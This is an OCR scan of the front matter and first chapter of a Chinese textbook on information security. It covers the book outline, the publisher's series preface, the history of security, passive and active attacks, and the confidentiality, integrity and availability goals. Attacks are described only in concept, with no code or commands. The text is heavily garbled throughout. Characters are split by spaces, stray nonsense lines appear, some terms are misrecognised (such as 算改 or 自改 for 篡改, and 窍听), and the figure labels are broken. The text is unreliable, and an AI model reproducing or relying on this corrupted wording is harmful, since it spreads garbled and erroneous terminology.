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内 容 简 介 


本 书 共 15 章 。 第 1 章 介绍 信息 安全 的 基本 概念 目标 和 研究 内 容 ; 第 2 章 介绍 密码 学 的 基本 概念 ,是 
信息 安全 的 基础 理论 ; 第 3 一 4 章 介绍 两 种 重要 的 密码 实现 体制 , 即 对 称 密码 体制 和 公 钥 密码 体制 ; 第 5 一 
7 章 介绍 了 密码 学 理论 的 应 用 机 制 , 分 别 是 消息 认证 、 身 份 认证 与 数字 签名 、 密 钥 管 理 ; 第 8 章 介绍 访问 控 
制 技术 ; 第 9 一 10 章 从 安全 技术 人 员 的 角度 介绍 网 络 攻击 技术 和 恶意 代码 分 析 ; 第 11 一 12 章 介绍 两 种 应 
用 广泛 的 安全 防护 系统 , 即 防火 墙 和 入 侵 检测 系统 ; 第 13 章 从 网 络 体 系 结构 上 分 别 介绍 网 络 层 ,传输 层 及 
应 用 层 的 安全 协议 ; 第 14 章 介绍 评估 信息 系统 安全 的 国内 外 标准 ; 第 15 章 编制 了 8 个 信息 安全 实验 ,使 
读者 通过 实际 操作 加 深 对 基础 理论 与 技术 的 理解 。 
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TV 
高 等 学 校 教材 - 计算 机 科学 与 技术 出 版 说 明 


改革 开放 以 来 ， 特别 是 党 的 十 五 大 以 来 ,我 国教 育 事业 取得 了 举世 瞩目 的 辉煌 成 就 ,高 等 
教育 实现 了 历史 性 的 跨越 ,已 由 精英 教育 阶段 进入 国际 公认 的 大 众 化 教育 阶段 。 在 质 
量 不 断 提 高 的 基础 上 ,高 等 教育 规模 取得 如 此 快速 的 发 展 ,创造 了 世界 教育 发 展 史上 的 
奇迹 。 当 前 ,教育 工作 既 面 临 着 千 载 难 着 的 良好 机 遇 , 同 时 也 面临 着 前 所 未 有 的 严峻 挑 
战 。 社 会 不 断 增长 的 高 等 教育 需求 同 教育 供给 特别 是 优质 教育 供给 不 足 的 矛盾 ,是 现 
阶段 教育 发 展 面临 的 基本 矛盾 。 

教育 部 一 直 十 分 重视 高 等 教育 质量 工作 。2001 年 8 月 .教育 部 下 发 了 《关于 加 强 
高 等 学 校本 科教 学 工作 ,提高 教学 质量 的 若干 意见 》, 提 出 了 十 二 条 加 强 本 科教 学 工作 
提高 教学 Bele 2003 年 6 月 和 2004 年 2 月 ,教育 部 分 别 下 发 了 《关于 启 
动 高 等 学 校 教学 质量 与 教学 改革 工程 精品 课程 建设 工作 的 通知 》 和 《教育 部 实施 精品 课 
conoid ite tt he esate ww 
工程 "是 教育 部 正在 制定 的 (2003 一 2007 年 教育 振兴 行动 计划 》 的 重要 组 成 部 分 ,精品 
课程 建设 是 “质量 工程 ”的 重要 内 容 之 一 。 教 育 部 计划 用 五 年 时 间 (2003 一 2007 年 ) 建 
设 1500 门 国家 级 精品 课程 ,利用 现代 化 的 教育 信息 技术 手段 将 精品 课程 的 相关 内 容 上 
网 并 免费 开放 ,以 实现 优质 教学 资源 共享 ,提高 高 等 学 校 教学 质量 和 人 才 培 养 质 量 。 
为 了 深入 贯彻 落实 教育 部 (关于 加 强 高 等 学 校本 科教 学 工作 ,提高 教学 质量 的 若干 
意见 ) 精 神 ,紧密 配合 教育 部 已 经 启动 的 “高 等 学 校 教学 质量 与 教学 改革 工程 精品 课程 
建设 工作 ”, 在 有 关 专 家 教授 的 倡议 和 有 关 部 门 的 大 力 支持 下 ,我 们 组 织 并 成 立 了 * 清 
华 大 学 出 版 社 教材 编审 委员 会 "(以 下 简称 “ 编 委 会 ”) , 旨 在 配合 教育 部 制定 精品 课程 教 
材 的 出 版 规划 ,讨论 并 实施 精品 课程 教材 的 编写 与 出 版 工作 。“ 编 委 会 "成员 皆 来 自 全 
国 各 类 高 等 学 校 教学 与 科研 第 一 线 的 骨干 教师 .其 中 许多 教师 为 各 校 相关 院 、 系 主管 教 
学 的 院 长 或 系 主任 。 
按照 教育 部 的 要 求 ,“ 编 委 会 ”一 致 认为 ,精品 课程 的 建设 工作 从 开始 就 要 坚持 高 标 
准 、 严 要 求 , 处 于 一 个 比较 高 的 起 点 上 ; 精品 课程 教材 应 该 能 够 反映 各 高 校 教学 改革 与 
课程 建设 的 需要 ,要 有 特色 风格 有 创新 性 (新 体系 、 新 内 容 、 新 手段 ,新 思路 ,教材 的 内 
容 体系 有 较 高 的 科学 创新 .技术 创新 和 理念 创新 的 含量 ) 先进 性 (对 原 有 的 学 科 体 系 有 
实质 性 的 改革 和 发 展 、 顺 应 并 符合 新 世纪 教学 发 展 的 规律 代表 并 引领 课程 发 展 的 趋 
势 和 方向 ) .示范 性 (教材 所 体现 的 课程 体系 具有 和 较 广泛 的 辐射 性 和 示范 性 ) 和 一 定 的 


前 上 脆性。 教材 由 个 人 申报 或 各 校 推荐 (通过 所 在 高 校 的 “ 编 委 会 "成 员 推荐 ) ,经 “ 编 委 会 " 认 
真 评审 ,最 后 由 清华 大 学 出 版 社 审定 出 版 。 

目前 ,针对 计算 机 类 和 电子 信息 类 相关 专业 成 立 了 两 个 “ 编 委 会 ”, 即 “清华 大 学 出 版 社 
计算 机 教材 编审 委员 会 "和 “清华 大 学 出 版 社 电子 信息 教材 编审 委员 会 "。 首 批 推出 的 特色 
精品 教材 包括 : 

(1) 高 等 学 校 教材 计算 机 应 用 一 一 高 等 学 校 各 类 专业 ,特别 是 非 计算 机 专业 的 计算 
机 应 用 类 教材 。 

(2) 高 等 学 校 教材 .计算 机 科学 与 技术 一 一 高 等 学 校 计算 机 相关 专业 的 教材 。 

(3) 高 等 学 校 教材 。 电子 信息 一 一 高 等 学 校 电子 信息 相关 专业 的 教材 。 

(4) 高 等 学 校 教材 ， 软件 工程 一 一 高 等 学 校 软件 工程 相关 专业 的 教材 。 

(5) 高 等 学 校 教材 .信息 管理 与 信息 系统 。 

(6) 高 等 学 校 教材 ， 财经 管理 与 计算 机 应 用 。 


清华 大 学 出 版 社 经 过 20 年 的 努力 ,在 教材 尤其 是 计算 机 和 电子 信息 类 专业 教材 出 版 方 
面 树立 了 权威 品牌 ,为 我 国 的 高 等 教育 事业 做 出 了 重要 贡献 。 清 华 版 教材 形成 了 技术 准确 、 
内 容 严谨 的 独特 风格 ,这 种 风格 将 延续 并 反映 在 特色 精品 教材 的 建设 中 。 


清华 大 学 出 版 社 教材 编审 委员 会 
E-mail: dingl@tup. tsinghua. edu. cn 


高 等 学 校 教材 - 计算 机 科学 与 技术 


当今 时 代 是 信息 的 时 代 ,信息 成 为 社会 发 展 的 重要 战略 资源 。 信息 的 安全 交换 ,存储 和 保 
障 能 力 成 为 综合 国力 和 经 济 竞 争 力 的 重要 组 成 部 分 。 我 国政 府 把 信息 安全 技术 与 产业 
列 为 今后 一 段 时 期 的 优先 发 展 领域 。 

信息 安全 教育 在 我 国 高 等 教育 中 正在 逐步 展开 。 教 育 部 继 2001 年 批准 在 武汉 大 
学 开设 信息 安全 本 科 专 业 之 后 ,又 先后 批准 了 几 十 所 高 等 院 校 设立 信息 安全 本 科 专 业 ， 
而 且 许多 高 校 和 科研 院 所 已 设立 了 信息 安全 方向 的 具有 硕士 和 博士 学 位 授予 权 的 学 科 
点 。 另 外 ,教育 部 2005 年 7 号 文件 出 台 了 “关于 进一步 加 强 信息 安全 学 科 、 专 业 建 设 和 
人 才 培 养 工作 的 意见 ”, 并 将 建立 国家 网 络 信息 安全 保障 体系 确定 为 国家 发 展 的 基本 战 
略 目标 之 一 。 

目前 有 关 信 息 安全 的 书籍 很 多 ,其 中 不 乏 精 品 。 然 而 ,由 于 信息 安全 所 涵盖 的 内 容 
非常 广泛 ,要 想 在 一 部 教材 中 介绍 信息 安全 的 方方面面 是 不 切实 际 的 ,在 内 容 安排 上 都 
会 做 适当 的 取舍 。 笔 者 在 实际 教学 过 程 中 发 现 , 正 是 这 种 取舍 造成 目前 信息 安全 基础 
教材 普遍 存在 两 个 方面 的 缺憾 。 其 一 ,对 密码 学 基础 理论 缺乏 比较 系统 的 介绍 。 密 码 
学 是 信息 安全 的 基石 ,信息 安全 理论 与 技术 大 多 建立 在 密码 学 基础 之 上 ,但 遗憾 的 是 ， 
目前 信息 安全 基础 教材 大 多 突出 密码 学 的 应 用 ,而 忽视 了 对 基础 知识 的 介绍 。 其 二 , 没 
有 与 信息 安全 理论 相应 的 实验 内 容 。 实 验 教学 是 信息 安全 基础 教学 中 不 可 缺少 的 内 
容 , 但 目前 的 信息 安全 基础 教材 要 么 没有 实验 内 容 .要么 有 实验 内 容 但 对 实验 环境 要 求 
较 高 ,在 实际 教学 中 没有 可 操作 性 。 因 此 ,在 本 书 的 内 容 编 排 上 ,力求 理论 与 实践 相 结 
合 ,包含 了 密码 学 基础 理论 .密码 学 应 用 机 制 、 实 用 安全 技术 及 相关 实验 内 容 , 使 读者 更 
清晰 地 从 信息 安全 体系 的 层面 掌握 信息 安全 的 基础 理论 和 应 用 技术 。 

本 书 内 容 共 分 为 15 章 。 

第 1 章 介绍 信息 安全 的 基本 概念 .发展 历史 、 实 现 的 目标 以 及 主要 的 研究 内 容 。 

第 2 一 4 章 介 绍 密码 学 基础 理论 : 第 2 章 对 密码 学 进行 综述 ,介绍 了 密码 学 的 基本 
概念 ,密码 系统 及 其 分 类 ,并 对 经 典 密码 学 的 基本 方法 进行 了 阐述 ; 第 3 章 介 绍 对 称 密 
人 码 体制 ,包括 分 组 密码 和 序列 密码 ,并 对 代表 性 的 对 称 密码 DES、AES、RC4 等 进行 了 
阐述 ; 第 4 章 对 公 钥 密码 体制 进行 了 介绍 ,包括 数论 基础 、 公 钥 密 码 体 制 的 基本 原理 ， 
并 对 代表 性 的 RSA 密码 及 其 他 公 钥 密码 进行 了 阐述 。 

第 5 一 7 章 介绍 密码 学 应 用 机 制 : 第 5 章 介 绍 了 用 于 解决 信息 安全 完整 性 的 消息 


V 


信息 安全 原理 及 应 用 


认证 机 制 ,重点 包括 消息 认证 码 和 Hash 函数 ; 第 6 章 介 绍 了 身份 认证 与 数字 签名 技术 ,其 
中 ,身份 认证 是 实现 访问 控制 的 基本 前 提 , 而 数字 签名 则 用 于 解决 信息 安全 的 抗 否认 性 。 第 
7 章 介绍 了 密 钥 管理 机 制 ,包括 对 称 密码 体制 下 的 密 钥 管 理 和 公 钥 密码 体制 下 的 密 钥 管理 ， 
重点 是 公 钥 证 书 的 管理 及 PKI。 

第 8 一 12 章 介绍 安全 保障 技术 : 第 8 章 介绍 访问 控制 技术 ,包括 访问 控制 策略 和 常用 
的 网 络 访问 控制 方法 ; 第 9 章 介绍 了 常用 的 网 络 攻击 技术 和 相应 的 防范 方法 ; 第 10 章 介绍 
了 恶意 代码 分 析 技 术 ,根据 对 恶意 代码 的 分 类 ,逐一 介绍 了 各 类 恶意 代码 及 其 防范 方法 ; 第 
11 章 介 绍 了 防火 墙 系统 ,包括 防火 墙 的 原理 与 分 类 基本 技术 ,以 及 在 实际 部 署 中 的 体系 结 
构 ; 第 12 章 介 绍 了 入 侵 检测 系统 ,包括 人 侵 检 测 系统 的 分 类 和 主要 检测 方法 ,并 以 Snort 
为 例 阐述 了 入 侵 检 测 系 统 的 基本 结构 。 

第 13 章 介绍 安全 协议 ,对 TCP/IP 体系 结构 进行 了 安全 分 析 , 并 从 网 络 体系 结构 上 分 
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在 全 球 信息 化 的 推动 下 ,实现 政府 管理 信息 化 、 企 业经 营 信息 化 以 及 国防 信息 化 已 经 成 
为 时 代 不 可 抵挡 的 潮流 。 信 息 技术 和 信息 产业 以 前 所 未 有 之 势 , 渗 透 到 各 行 各 业 和 社会 生 
活 当中 ,正在 逐渐 改变 着 人 们 的 生产 和 生活 方式 .推动 着 社会 的 进步 。 

但 是 ,在 信息 网 络 的 作用 不 断 扩 大 的 同时 ,信息 网 络 的 安全 也 变 得 日 益 重 要 ,网 络 系统 
一 旦 遭 到 破坏 ,其 影响 和 损失 也 将 十 分 巨大 。 信 息 安 全 不 仅 关系 到 普通 民众 的 利益 ,也 是 影 
响 社会 经 济 发 展 ` 政 治 稳定 和 国家 安全 的 战略 性 问题 。 因 此 ,信息 安全 问题 已 经 成 为 国内 外 
专家 学 者 广泛 关注 的 课题 。 


11 信息 安全 的 概念 


要 了 解 信息 安全 ,首先 要 了 解 什么 叫 信息 。 

信息 (information) 是 经 过 加 工 ( 获 取 、 推 理 、 分析 、 计算、 存储 等 ) 的 特定 形式 数据 ,是 
物质 运动 规律 的 总 和 。 信 息 的 主要 特点 具有 时 效 性 、 新 知性 和 不 确定 性 ,信息 是 有 价 
值 的 。 

给 信息 安全 下 一 个 确切 的 定义 是 比较 困难 的 ,主要 是 因为 它 包 含 的 内 容 太 过 广泛 ,如 国 
家 军事 政治 等 机 密 安全 ,防范 商业 企业 机 密 泄露 ,防范 青少年 对 不 良 信 息 的 浏览 ,防范 个 人 
信息 的 泄露 等 。 

信息 安全 是 指 信 息 网 络 的 硬件 .软件 及 其 系统 中 的 数据 受到 保护 ,不 受 偶然 的 或 者 恶意 
的 原因 而 遭 到 破坏 更改. 泄露 ,系统 连续 可 靠 正 常 地 运行 ,信息 服务 不 中 断 。 

信息 安全 是 一 门 涉及 计算 机 科学 、 网 络 技术 .通信 技术 、 密 码 技术 、 信 息 安 全 技术 .应 用 
数学 .数论 .信息 论 等 多 种 学 科 的 综合 性 学 科 。 从 广义 来 说 ,凡是 涉及 信息 的 保密 性 、 完 整 
性 、 可 用 性 、 真 实 性 和 可 控 性 的 相关 技术 和 理论 都 是 信息 安全 的 研究 领域 。 

信息 安全 涉及 的 知识 领域 如 图 1-1 所 示 。 
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1-1 信息 安全 涉及 的 知识 领域 


12 信息 安全 的 发 展 历 史 


从 历史 中 学 习 经 验 ,可 以 使 我 们 减少 重复 之 前 错误 的 几率 。 

随 着 社会 和 技术 的 不 断 进 步 , 人 们 处 理 信 息 资 源 的 安全 方式 也 是 不 断 发 展 的 。 理 解 这 
种 发 展 历史 对 于 理解 今天 如 何 实现 信息 安全 非常 重要 。 在 信息 安全 的 发 展 历史 中 ,经 历 了 
古典 信息 安全 、 辐 射 安全 ,计算机 安全 、 网 络 安全 和 信息 安全 等 几 个 阶段 。 


1. 古典 信息 安全 


很 久 以 前 ,所 有 的 财产 包括 信息 都 是 物理 的 .为 了 保护 这 些 财产 ,人 们 利用 物理 性 安全 
措施 ,比如 城墙 、 护 城 河 、 秘 密 的 藏 宝地 等 。 传 递 信息 一 般 由 可 靠 的 使 者 完成 。 但 这 种 安全 
有 其 缺陷 ,一旦 信息 在 传输 过 程 中 被 截获 , 则 信息 的 内 容 会 被 敌人 知晓 。 其 解决 方法 是 采用 
某 些 安 全 措施 ,例如 早期 采用 密封 的 陶 龟 作 为 信封 米 传 输 信息 .一 旦 密封 被 破坏 , 则 表示 信 
息 的 安全 性 受到 了 破坏 。 

当然 ,这 种 方法 无 法 防范 信息 的 内 容 被 窃取 。 所 以 早 在 Julius Caesar 时 期 ,人 们 就 采 
用 了 某 种 通信 安全 措施 。Julius Caesar 发 明了 恺 撤 密码 ,信息 就 算 被 截获 也 无 法 读 出 具体 
内 容 。 这 种 观念 一 直 被 持续 到 第 二 次 世界 大 战 。 德 国 使 用 了 一 台 名 为 Enigma 的 机 器 对 发 
送 到 军事 部 门 的 消息 进行 加 密 。 

消息 并 不 是 唯一 的 通信 数据 ,为 了 防范 敌人 监听 语音 消息 ,美国 军事 部 门 使 用 纳 瓦 霍 语 
(Navaho) 的 通信 员 。 传 送 消息 采用 其 母语 ,即使 敌人 监听 到 无 线 电 广播 :他 们 也 不 可 能 理 
解 听 到 的 消息 。 

第 二 次 世界 大 战 以 后 ,前 苏联 使 用 一 次 性 便条 (one-time-pad) 保 护 间谍 发 送 的 消息 。 
一 次 性 便条 是 一 琶 在 每 一 页 上 都 标 有 随机 数字 的 纸 ,每 页 纸 用 于 一 条 消息 。 如 果 使 用 正确 ， 
那么 这 种 加 密 机 制 是 无 法 破解 的 ,但 遗憾 的 是 ,苏联 人 没有 正确 使 用 (他 们 重复 使 用 了 一 次 
性 便条 ) ,因此 有 一 些 消 息 就 被 破解 了 。 

古典 信息 安全 基本 上 是 建立 在 古典 密码 学 基础 之 上 的 。 


2. 辐射 安全 


只 要 使 用 加 密 系 统 时 不 犯错 误 , 好 的 加 密 方 法 就 很 难 被 破解 。 因 此 人 们 试图 通过 其 他 
方式 获取 信息 。 在 20 世纪 50 年 代 , 人 们 认识 到 可 以 通过 获取 电话 线 上 传输 的 电信 号 来 获 
取消 息 。 甚 至 在 目前 ,有 专门 的 仪器 可 以 接收 显示 器 的 电磁 辐射 ,来 还 原 显示 内 容 。 针 对 这 
一 问题 ,美国 人 建立 了 一 套 名 为 TEMPEST 的 规范 ,规定 了 在 敏感 环境 中 使 用 计算 机 的 电 
子 辐 射 标准 ,其 目的 是 减少 可 以 被 用 于 收集 信息 的 电磁 辐射 。 在 我 国 的 信息 系统 安全 等 级 
保护 系列 标准 中 也 明确 规定 了 安全 计算 机 系统 应 该 遵守 的 防 辐 射 要 求 。 


3. 计算 机 安全 


在 20 世纪 70 年 代 初 期 ,David Bell 和 Leonard La Padula 提出 了 一 种 保护 计算 机 操作 
的 模型 。 该 模型 是 以 政府 对 不 同 级 别 的 分 类 信息 (不 保密 、 限 制 、 保 密 、 机 密 和 绝密 ) 和 不 同 
级 别 的 许可 权限 的 概念 为 基础 的 。 如 果 某 个 人 的 许可 级 别 高 于 文件 的 分 类 级 别 , 那 么 这 个 
人 就 可 以 访问 该 文件 。 反 之 , 则 被 拒绝 。 

这 种 模型 的 概念 最 终于 1985 年 形成 了 美国 国防 部 标准 (United States Department of 
Defense Standard)5200. 28 可 信 计 算 系 统 评估 标准 (Trusted Computing System Evaluation 
Criteria,TCSEC, 也 称 杰 皮 书 或 橘 皮 书 ) ,多 年 以 来 一 直 是 评估 多 用 户主 机 和 小 型 操作 系统 
的 主要 方法 。 


4. 网 络 安全 


当 计 算 机 相互 连接 形成 网 络 时 ,就 会 出 现 新 的 安全 问题 ,而 原 有 的 问题 也 会 以 不 同方 式 
表现 。 通 信和 需要 通过 局 域 网 或 者 广域网 ,那么 专业 加 密 器 用 起 来 就 比较 麻烦 。 还 有 遍布 建 
筑 物 内 的 铜 线 发 出 的 辐射 问题 ,无线 网 络 的 辐射 安全 问题 等 。 不 同 的 系统 相互 连接 ,任何 一 
个 薄弱 的 环节 都 会 造成 整个 网 络 的 安全 问题 。 网 络 安全 的 解决 方法 显然 不 是 某 一 种 技术 或 
者 某 一 个 标准 可 以 实现 的 。 它 需要 多 种 安全 措施 共同 起 作用 ,例如 加 密 、 安 全 认证 ,访问 控 
制 , 安 全 管理 等 。 目 前 ,网 络 安全 是 信息 安全 的 主要 组 成 部 分 。 


5. 信息 安全 


显然 没有 一 种 方案 可 以 解决 所 有 的 安全 问题 。 事 实 上 ,优秀 的 安全 方案 应 该 是 以 上 解 
决 方案 的 综合 ,优秀 的 物理 方案 保护 物理 财产 ,比如 纸 上 的 记录 和 系统 。 通 信安 全 保护 传输 
中 的 信息 。 当 敌人 可 能 从 计算 机 系统 读 取 电 子 辐射 信息 时 就 必须 考虑 到 辐射 安全 。 计 算 安 
全 是 控制 对 计算 机 系统 的 访问 所 必需 的 。 这 些 概念 综合 在 一 起 就 构成 了 信息 安全 。 


13 信息 安全 的 目标 
信息 安全 的 目标 是 指 保障 信息 系统 在 遭受 攻击 的 情况 下 信息 的 某 些 安全 性 质 不 变 。 通 


俗 地 讲 , 信 息 安全 的 目标 提出 了 这 样 一 个 问题 , 即 信息 究竟 怎样 才 算是 安全 了 呢 ? 在 提出 信 
息 安全 的 目标 之 前 ,有 必要 先 分 析 一 下 各 种 安全 攻击 以 及 这 些 攻 击 对 信息 系统 造成 的 影响 。 
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1.3.1 安全 性 攻击 


为 了 获取 有 用 的 信息 或 者 达到 某 种 目的 ,攻击 者 会 采取 各 种 攻击 方法 对 信息 系统 进行 
攻击 。 这 些 攻击 方法 分 为 两 类 : 被 动 攻 击 和 主动 攻击 。 其 中 ,被 动 攻 击 试图 了 解 或 利用 通 
信 系统 的 信息 但 不 影响 系统 资源 ,而 主动 攻击 则 试图 改变 系统 资源 或 影响 系统 运作 。 


1. 被 动 攻 击 


被 动 攻击 是 指 攻击 者 在 未 被 授权 的 情况 下 ,非法 获取 信息 或 数据 文件 ,但 不 对 数据 信息 
做 任何 修改 。 通 常 包括 监听 未 受 保护 的 通信 流量 分 析 、 解 密 弱 加 密 的 数据 流 、 获 得 认证 信 
息 等 。 被 动 攻击 的 特性 是 对 传输 进行 窍 听 和 监测 ,攻击 者 的 目标 是 获得 传输 的 信息 。 常 用 
的 被 动 攻击 手段 如 下 所 述 。 

(1) 搭 线 监听 : 搭 线 监听 是 将 导线 搭 到 无 人 值守 的 网 络 传输 线路 上 进行 监听 。 只 要 所 
搭 的 监听 设备 不 影响 网 络 负载 ,通常 不 易 被 发 觉 。 然 后 通过 解 调和 正确 的 协议 分 析 , 就 可 以 
掌握 通信 的 全 部 内 容 。 

(2) 无 线 截获 : 通过 高 灵敏 接收 装置 接收 网 络 站 点 或 网 络 连接 设备 辐射 的 电磁 波 , 然 
后 对 电磁 信号 进行 分 析 , 可 以 恢复 数据 信号 进而 获得 网 络 传输 的 信息 。 对 于 无 线 网 络 通信 ， 
无 线 截获 与 搭 线 监听 有 同样 的 效果 。 

(3) 其 他 截获 : 用 程序 和 病毒 截获 信息 是 计算 机 技术 发 展 的 新 型 手段 ,在 通信 设备 或 
主机 中 种 植木 马 或 施放 病毒 程序 后 ,这 些 程序 会 将 有 用 的 信息 通过 某 种 方式 远程 发 送出 来 。 

(4) 流量 分 析 : 假设 通过 某 种 手段 (如 加 密 ) 使 得 攻击 者 从 截获 的 信息 中 无 法 得 到 消息 
的 真实 内 容 。 攻 击 者 还 可 以 通过 观察 这 些 数据 的 模式 ,分 析出 通信 双方 的 位 置 .通信 的 次 数 
及 消息 的 长 度 等 信息 ,而 这 些 信息 可 能 对 通信 双方 来 说 也 是 不 希望 被 攻击 者 得 知 的 ,这 种 攻 
击 手段 称 为 流量 分 析 。 

被 动 攻击 由 于 不 涉及 对 数据 的 更 改 , 所 以 很 难 察觉 。 然 而 通过 加 密 的 手段 阻止 这 种 攻 
击 却 是 可 行 的 。 因 此 对 付 被 动 攻击 的 重点 是 预防 ,而 不 是 检测 。 


2. 主动 攻击 


主动 攻击 包括 对 数据 流 进行 自 改 或 伪造 ,可 分 为 四 类 。 

(1) 伪装 : 是 指 某 实体 假冒 别 的 实体 ,以 获取 合法 用 户 的 被 授予 的 权利 。 

(2) 重 放 : 是 指 攻击 者 对 截获 的 合法 数据 进行 复制 ,然后 出 于 非法 目的 再 次 生成 ,并 在 
非 授 权 的 情况 下 进行 传输 。 

(3) 消息 自 改 : 是 指 对 一 个 合法 消息 的 某 些 部 分 进行 修改 ,删除 ,或 者 延迟 消息 的 传 
输 改变 消息 的 顺序 ,以 产生 混淆 是 非 的 效果 。 

(4) 拒绝 服务 : 阻止 或 禁止 信息 系统 正常 的 使 用 。 它 的 主要 形式 是 破坏 某 实 体 网 络 或 
信息 系统 ,使 得 被 攻击 目标 资源 耗 尽 或 降低 其 性 能 。 

主动 攻击 的 特点 与 被 动 攻击 恰好 相反 。 被 动 攻击 虽然 难以 检测 ,但 可 采取 相应 措施 有 
效 地 防止 ,而 要 绝对 防止 主动 攻击 是 十 分 困难 的 ,因为 需要 保护 的 范围 太 广 。 因 此 ,对 付 主 
动 攻击 的 重点 在 于 检测 并 从 攻击 造成 的 破坏 中 及 时 地 恢复 。 
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分 析 这 些 攻击 可 以 看 出 ,被动 攻击 使 得 机 密 信息 被 泄露 ,破坏 了 信息 的 机 密 性 ; 主动 攻 
击 的 伪装 、 重 放 、 消 息 算 改 等 破坏 了 信息 的 完整 性 ; 拒绝 服务 则 破坏 了 信息 系统 的 可 用 性 。 


1.32 信息 安全 的 目标 


信息 安全 的 目标 是 保护 信息 的 机 密 性 、 完 整 性 和 可 用 性 , 即 CIA (Confidentiality， 
Integrity, Availability)。 下 面 以 用 户 A 和 用 户 B 进行 一 次 通信 为 例 来 介绍 这 几 个 性 质 。 

机 密 性 是 指 保证 信息 不 被 非 授权 访问 , 即 A 发 出 的 信息 只 有 B 能 收 到 ,假设 有 第 三 方 
获取 了 信息 也 无 法 知晓 内 容 , 从 而 不 能 使 用 。 一 旦 有 第 三 方 获取 了 信息 内 容 , 则 说 明 信 息 的 
机 密 性 被 破坏 。 

完整 性 也 就 是 保证 真实 性 , 即 信 息 在 生成 ,传输 、 存 储 和 使 用 过 程 中 不 应 被 第 三 方 算 改 。 
如 用 户 A 发 出 的 信息 被 第 三 方 用 户 C 获取 了 ,并 且 对 内 容 进 行 了 算 改 , 则 说 明 信 息 的 真实 
性 被 破坏 。 

可 用 性 是 指 保障 信息 资源 随时 可 提供 服务 的 特性 , 即 授权 用 户 可 以 根据 需要 随时 访问 
所 需 信息 。 也 就 是 说 要 保障 A 能 顺利 地 发 送信 息 、B 能 顺利 地 接收 信息 。 

三 个 目标 只 要 有 一 个 被 破坏 ,就 表明 信息 的 安全 受到 了 破坏 。 

信息 安全 的 目标 是 致力 于 保障 信息 的 这 三 个 特性 不 被 破坏 。 构 建安 全 系统 的 一 个 挑战 
就 是 在 这 些 特性 中 找到 一 个 平衡 点 ,因为 它们 常常 是 相互 矛盾 的 。 例 如 在 安全 系统 中 ,只 需 
要 简单 地 阻止 所 有 人 读 取 一 个 特定 的 对 象 ,就 可 以 轻易 地 保护 此 对 
象 的 机 密 性 。 但 是 ,这 个 系统 并 不 是 安全 的 ,因为 它 不 能 满足 正当 访 /ute \ 

问 的 可 用 性 要 求 。 也 就 是 说 ,必须 在 机 密 性 和 可 用 性 之 间 找 到 平衡 。 Cr 

但 是 平衡 不 是 一 切 , 事 实 上 ,三 个 特征 既 可 以 独立 ,也 可 以 有 重 人 

县 ,如 图 1-2 所 示 ,甚至 可 以 彼此 不 相 容 ,例如 机 密 性 的 保护 会 严重 地 


限制 可 用 性 。 
除了 以 上 三 个 基本 特性 之 外 ,不 同 的 信息 系统 根据 其 业务 类 型 图 1-2 信息 安全 性 质 
的 不 同 ,可 能 还 有 更 加 细 化 的 具体 要 求 , 由 以 下 四 个 特性 来 保障 : 之 间 的 关系 


(1) 可 靠 性 (reliability)。 可 靠 性 是 指 系统 在 规定 条 件 下 和 规定 
时 间 内 、 完 成 规定 功能 的 概率 。 可 靠 性 是 网 络 安全 最 基本 的 要 求 之 一 ,网 络 不 可 靠 ,事故 不 
断 , 也 就 谈 不 上 网 络 的 安全 。 目 前 ,对 于 网 络 可 靠 性 的 研究 基本 上 偏重 于 硬件 可 靠 性 方面 。 
研制 高 可 靠 性 元 器 件 设备 ,采取 合理 的 元 余 备份 措施 仍 是 最 基本 的 可 靠 性 对 策 ,然而 ,有 许 
多 故障 和 事故 , 则 与 软件 可 靠 性 、 人 员 可 靠 性 和 环境 可 靠 性 有 关 。 

(2) 不 可 抵赖 性 Cnon-repudiation) 。 也 称 做 抗 否 认 性 。 抗 抵赖 性 是 面向 通信 双方 (人 、 
实体 或 进程 ) 信 息 真实 统一 的 安全 要 求 , 它 包括 收发 双方 均 不 可 抵赖 。 一 是 源 发 证 明 , 它 提 
供给 信息 接收 者 以 证 据 , 这 将 使 发 送 者 谎 称 未 发 送 过 这 些 信 息 或 者 否认 它 的 内 容 的 企图 不 
能 得 逮 ; 二 是 交付 证 明 , 它 提供 给 信息 发 送 者 以 证 据 , 这 将 使 接收 者 谎 称 未 接收 过 这 些 信 息 
或 者 否认 它 的 内 容 的 企图 不 能 得 运 。 

(3) 可 控 性 : 可 控 性 就 是 对 信息 及 信息 系统 实施 安全 监控 。 管 理 机 构 对 危害 国家 信息 
的 来 往 、 使 用 加 密 手 段 从 事 非法 的 通信 活动 等 进行 监视 审计 ,对 信息 的 传播 及 内 容 具 有 控制 
能 力 。 
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(4) 可 审查 性 : 使 用 审计 、 监 控 \ 防 抵赖 等 安全 机 制 ,使 得 使 用 者 (包括 合法 用 户 、 攻 击 
者 ,破坏 者 、 抵 赖 者 ) 的 行为 有 证 可 查 , 并 能 够 对 网 络 出 现 的 安全 问题 提供 调查 依据 和 手段 。 
审计 是 通过 对 网 络 上 发 生 的 各 种 访问 情况 记录 日 志 , 并 对 日 志 进 行 统计 分 析 , 是 对 资源 使 用 
情况 进行 事后 分 析 的 有 效 手 段 ,也 是 发 现 和 追踪 事件 的 常用 措施 。 审 计 的 主要 对 象 为 用 户 、 
主机 和 结 点 ,主要 内 容 为 访问 的 主体 、 客 体 、 时 间 和 成 败 情况 等 。 


14 信息 安全 的 研究 内 容 


信息 安全 的 研究 范围 非常 广泛 ,其 领域 划分 成 三 个 层次 : 信息 安全 基础 理论 研究 .信息 
安全 应 用 技术 研究 和 信息 安全 管理 研究 ,如 图 1-3 所 示 。 基 础 理论 研究 包括 密码 研究 安全 
理论 研究 ; 应 用 技术 研究 包括 安全 实现 技术 、 安 全 平台 技术 研究 ; 安全 管理 研究 包括 安全 
标准 \ 安 全 策略 ,安全 测评 等 。 


信息 安全 管理 
安全 标准 、 安 全 策略 、 安 全 测评 。 | 
RE 人 
安全 实现 技术 1 1 安全 平 8 技 术 | 
1 
[| | 
!|_ 汤 洞 扫描 ! | 系统 安全 数据 安全 
1 
1| 入 侵 / 病 毒 检测 |!， | | 
攻 | 


图 1-3 信息 安全 的 研究 范围 


其 中 ,信息 安全 基础 理论 是 整个 研究 内 容 的 基础 ,为 信息 安全 应 用 技术 和 安全 管理 提供 
理论 指导 ; 信息 安全 应 用 技术 是 实现 信息 安全 的 实际 手段 ; 信息 安全 管理 则 研究 实现 信息 
安全 的 各 种 标准 ,策略 ,规章 、 制 度 。 


141 信息 安全 基础 研究 


信息 安全 基础 研究 的 主要 内 容 包括 密码 学 研究 和 网 络 信息 安全 基础 理论 研究 。 
1. 密码 理论 


